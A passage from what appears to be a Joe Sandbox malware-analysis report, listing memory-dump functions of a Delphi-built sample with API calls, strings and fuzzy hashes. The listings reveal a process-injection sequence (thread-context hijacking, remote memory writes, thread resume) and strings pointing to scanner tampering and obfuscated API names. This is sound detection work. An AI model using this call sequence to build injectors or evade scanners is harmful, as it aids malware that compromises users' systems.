                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: FreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 1263568516-0
                                                                        • Opcode ID: 01441dc93676877d918ea675a5c0997b56698b0f40d06fb54c210243191ca064
                                                                        • Instruction ID: 4f51ccd60e68b623f38f870343450609f3041fe81b00a9210add60bb7cdb422b
                                                                        • Opcode Fuzzy Hash: 01441dc93676877d918ea675a5c0997b56698b0f40d06fb54c210243191ca064
                                                                        • Instruction Fuzzy Hash: 7FE086753403216FD7105A7E5D887526BDCEB44664F284475F909DB241D6E0E850CB68

                                                                        Non-executed Functions

                                                                        Function 02C6AB1C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02C6ADA3,?,?,02C6AE35,00000000,02C6AF11), ref: 02C6AB30
                                                                        • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02C6AB48
                                                                        • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02C6AB5A
                                                                        • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02C6AB6C
                                                                        • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02C6AB7E
                                                                        • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02C6AB90
                                                                        • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02C6ABA2
                                                                        • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02C6ABB4
                                                                        • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02C6ABC6
                                                                        • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02C6ABD8
                                                                        • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02C6ABEA
                                                                        • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02C6ABFC
                                                                        • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02C6AC0E
                                                                        • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02C6AC20
                                                                        • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02C6AC32
                                                                        • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02C6AC44
                                                                        • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02C6AC56
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$HandleModule
                                                                        • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                        • API String ID: 667068680-597814768
                                                                        • Opcode ID: 5cfc946d253169d807c6bea42c969f3e75dcd139b1c216f2ed47cb00a32e6d8d
                                                                        • Instruction ID: c1266610fc37ce4f441e75ec54bac9357dfa8fd5e75933b8d7f5bac4cbc08538
                                                                        • Opcode Fuzzy Hash: 5cfc946d253169d807c6bea42c969f3e75dcd139b1c216f2ed47cb00a32e6d8d
                                                                        • Instruction Fuzzy Hash: 7431AFB0A81660AFEF10EFB4D8C9B2977EDAB157017500E65E802DF204EB75E854DF16
                                                                        Function 02C68D70 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 02C689D0: FreeLibrary.KERNEL32(74CD0000,00000000,00000000,00000000,00000000,02CD738C,Function_0000662C,00000004,02CD739C,02CD738C,05F5E103,00000040,02CD73A0,74CD0000,00000000,00000000), ref: 02C68AAA
                                                                          • Part of subcall function 02C68788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02C68814
                                                                        • GetThreadContext.KERNEL32(00000000,02CD7424,ScanString,02CD73A8,02C6A93C,UacInitialize,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,UacInitialize,02CD73A8), ref: 02C69602
                                                                          • Part of subcall function 02C67A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C67A9F
                                                                          • Part of subcall function 02C67D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C67DEC
                                                                        • SetThreadContext.KERNEL32(00000000,02CD7424,ScanBuffer,02CD73A8,02C6A93C,ScanString,02CD73A8,02C6A93C,Initialize,02CD73A8,02C6A93C,00000000,-00000008,02CD74FC,00000004,02CD7500), ref: 02C6A317
                                                                        • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02CD7424,ScanBuffer,02CD73A8,02C6A93C,ScanString,02CD73A8,02C6A93C,Initialize,02CD73A8,02C6A93C,00000000,-00000008,02CD74FC), ref: 02C6A324
                                                                          • Part of subcall function 02C6894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize,02CD73A8,02C6A93C,UacScan), ref: 02C68960
                                                                          • Part of subcall function 02C6894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02C6897A
                                                                          • Part of subcall function 02C6894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02CD73A8,02C6A587,ScanString,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,Initialize), ref: 02C689B6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryThread$ContextFreeMemoryVirtual$AddressAllocateCreateLoadProcProcessResumeUserWrite
                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                        • API String ID: 2624078988-51457883
                                                                        • Opcode ID: 96d24af4ee5b881e00082843f03e3bba74d167f591a2802ae39c042361b6cb3f
                                                                        • Instruction ID: 97d578f794351447a35f57304317beb61b04dc37fe7b89e9d5fd5d7b163afdef
                                                                        • Opcode Fuzzy Hash: 96d24af4ee5b881e00082843f03e3bba74d167f591a2802ae39c042361b6cb3f
                                                                        • Instruction Fuzzy Hash: 96E2FD35A405289BDB25FF64DCC5BDEB3BAEF84300F5041A1A505AB214DA30EEC9EF59
                                                                        Function 02C68D6E Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 02C689D0: FreeLibrary.KERNEL32(74CD0000,00000000,00000000,00000000,00000000,02CD738C,Function_0000662C,00000004,02CD739C,02CD738C,05F5E103,00000040,02CD73A0,74CD0000,00000000,00000000), ref: 02C68AAA
                                                                          • Part of subcall function 02C68788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02C68814
                                                                        • GetThreadContext.KERNEL32(00000000,02CD7424,ScanString,02CD73A8,02C6A93C,UacInitialize,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,ScanBuffer,02CD73A8,02C6A93C,UacInitialize,02CD73A8), ref: 02C69602
                                                                          • Part of subcall function 02C67A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02C67A9F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateContextCreateFreeLibraryMemoryProcessThreadUserVirtual
                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                        • API String ID: 4276370345-51457883
                                                                        • Opcode ID: d449eac1a037783d424b4167aff9eefb060da1fcc5030f1ded95114372756113
                                                                        • Instruction ID: a64c8dee16859f6869c2b3f9f5b922f286a7b26e8c5f1ef2cb5e048f2330a4ed
                                                                        • Opcode Fuzzy Hash: d449eac1a037783d424b4167aff9eefb060da1fcc5030f1ded95114372756113
                                                                        • Instruction Fuzzy Hash: 38E2FD34A405289BDB25FF64DCC5BDEB3BAEF84300F5041A1A505AB214DA30EEC9EF59
                                                                        Function 02C55908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,02C56C14,02C50000,02C7E790), ref: 02C55925
                                                                        • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02C5593C
                                                                        • lstrcpynA.KERNEL32(?,?,?), ref: 02C5596C
                                                                        • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02C56C14,02C50000,02C7E790), ref: 02C559D0
                                                                        • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02C56C14,02C50000,02C7E790), ref: 02C55A06
                                                                        • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02C56C14,02C50000,02C7E790), ref: 02C55A19
                                                                        • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C56C14,02C50000,02C7E790), ref: 02C55A2B
                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C56C14,02C50000,02C7E790), ref: 02C55A37
                                                                        • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C56C14,02C50000), ref: 02C55A6B
                                                                        • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02C56C14), ref: 02C55A77
                                                                        • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02C55A99
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                        • String ID: GetLongPathNameA$\$kernel32.dll
                                                                        • API String ID: 3245196872-1565342463
                                                                        • Opcode ID: d06b2faa21d353de5f62ca2e0e9c25f69ac55a9a2aebd594b1e91d8ebdff7c14
                                                                        • Instruction ID: 45849707c41d6400e2039e6d75e94e22cfe07e8181cf47891d2e91eac5f9f7f6
                                                                        • Opcode Fuzzy Hash: d06b2faa21d353de5f62ca2e0e9c25f69ac55a9a2aebd594b1e91d8ebdff7c14
                                                                        • Instruction Fuzzy Hash: BD418F71D40229AFDB10DAE8CC88AEEB3BDAF44390F4405A5A948E7201D774DB848F58
                                                                        Function 02C55BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02C55BE8
                                                                        • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02C55BF5
                                                                        • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02C55BFB
                                                                        • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02C55C26
                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C55C6D
                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C55C7D
                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C55CA5
                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C55CB5
                                                                        • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02C55CDB
                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02C55CEB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                        • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                        • API String ID: 1599918012-2375825460
                                                                        • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                        • Instruction ID: 6bdb5e590d3bb231e13c6f03ce4d4ebca02acabe05e45bc620f467297f267f19
                                                                        • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                        • Instruction Fuzzy Hash: 5A318471E4067C2AEB25DAB48C49BDE76AD9B443C0F4401E19E09E6181EAB4EBC48F59
                                                                        Function 02C684C8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02C6823C,?,?,00000000,?,02C67A7E,ntdll,00000000,00000000,02C67AC3,?,?,00000000), ref: 02C6820A
                                                                          • Part of subcall function 02C681CC: GetModuleHandleA.KERNELBASE(?), ref: 02C6821E
                                                                          • Part of subcall function 02C68274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02C682FC,?,?,00000000,00000000,?,02C68215,00000000,KernelBASE,00000000,00000000,02C6823C), ref: 02C682C1
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02C682C7
                                                                          • Part of subcall function 02C68274: GetProcAddress.KERNEL32(?,?), ref: 02C682D9
                                                                        • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 02C68539
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$AddressProc$MemoryProtectVirtual
                                                                        • String ID: ntdll$yromeMlautriVtcetorPtN
                                                                        • API String ID: 3897345246-351734974
                                                                        • Opcode ID: be546113e427b7881e5b490a4cef6077d749d64e41b33b29c744399d7165ad86
                                                                        • Instruction ID: 558e1feb51e0852647f39533fae31af030f84c1517bdf7832426ad2df3a9b6f8
                                                                        • Opcode Fuzzy Hash: be546113e427b7881e5b490a4cef6077d749d64e41b33b29c744399d7165ad86
                                                                        • Instruction Fuzzy Hash: 12015EB4640208AFEB14EFA8DC85FAEB7EEEB48700F504A61B904D7600D630ED58DF24
                                                                        Function 02C57FD4 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02C57FF5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: DiskFreeSpace
                                                                        • String ID:
                                                                        • API String ID: 1705453755-0
                                                                        • Opcode ID: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                                        • Instruction ID: 2aa5c7a3d4f9bf4bf3f70d817d8d7b649ad2917c443912f496613100e26ea039
                                                                        • Opcode Fuzzy Hash: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                                        • Instruction Fuzzy Hash: E411D2B5E00209AF9B44CF99C881DAFF7F9FFC8300B54C559A909E7254E6719A418B90
                                                                        Function 02C5A7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C5A7E2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 2299586839-0
                                                                        • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                        • Instruction ID: 86344db4d9f305e118bcc336c24d0db98217b8548c3000d9a653f51dacdc2138
                                                                        • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                        • Instruction Fuzzy Hash: 90E0927170022817D715A95A9C80EE6725D9B58310F40426AAD05C7385EDA0DEC04AEC
                                                                        Function 02C5B78C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(?,02C7D106,00000000,02C7D11E), ref: 02C5B79A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: Version
                                                                        • String ID:
                                                                        • API String ID: 1889659487-0
                                                                        • Opcode ID: dcec8c46fabb3f5b90f3e3f2479464d59cf6ec36139a4c688b6871a4c56710ff
                                                                        • Instruction ID: 580e0c0a07614d4373e568804a023e4060cca30e4cb099d534fe3ee85b9f5578
                                                                        • Opcode Fuzzy Hash: dcec8c46fabb3f5b90f3e3f2479464d59cf6ec36139a4c688b6871a4c56710ff
                                                                        • Instruction Fuzzy Hash: 99F017759043118FD350DF28D4417157BE9FB88744F014EA8EA98C7390E734D858CF66
                                                                        Function 02C5A810 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02C5BE72,00000000,02C5C08B,?,?,00000000,00000000), ref: 02C5A823
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 2299586839-0
                                                                        • Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                        • Instruction ID: 4259f27140beb3aefeb49c89670cfdeb8460793709dc9d6e3dc2b366ffc68e9b
                                                                        • Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
                                                                        • Instruction Fuzzy Hash: 87D05EA230E2702AA210915B2D84D7B5ADCCEC57A1F50413AFE88C6201D214CC47DAB5
                                                                        Function 02C5920C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1578834357.0000000002C51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true
                                                                        • Associated: 00000000.00000002.1578811955.0000000002C50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002CD7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1579210565.0000000002DCE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2c50000_jlPBMMQbXC.jbxd
                                                                        Similarity
                                                                        • API ID: LocalTime
                                                                        • String ID:
                                                                        • API String ID: 481472006-0
                                                                        • Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
                                                                        • Instruction ID: aa5316fc1f9f8a819b8099175e6109c32c8555ad4f503dea0cdcddfedd8b6360
